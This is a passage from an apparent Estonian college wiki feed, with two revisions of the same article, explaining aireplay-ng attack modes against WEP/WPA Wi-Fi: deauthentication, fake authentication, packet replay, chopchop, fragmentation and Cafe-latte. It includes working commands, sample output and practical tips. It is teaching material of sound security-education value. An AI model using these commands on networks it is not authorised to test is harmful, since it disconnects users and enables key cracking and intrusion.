* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:40:20  Sending Authentication Request&lt;br /&gt;
21:40:20  Authentication successful&lt;br /&gt;
21:40:20  Sending Association Request&lt;br /&gt;
21:40:20  Association successful :-)&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32787</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32787"/>
		<updated>2011-05-24T18:44:12Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Open Authentication */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
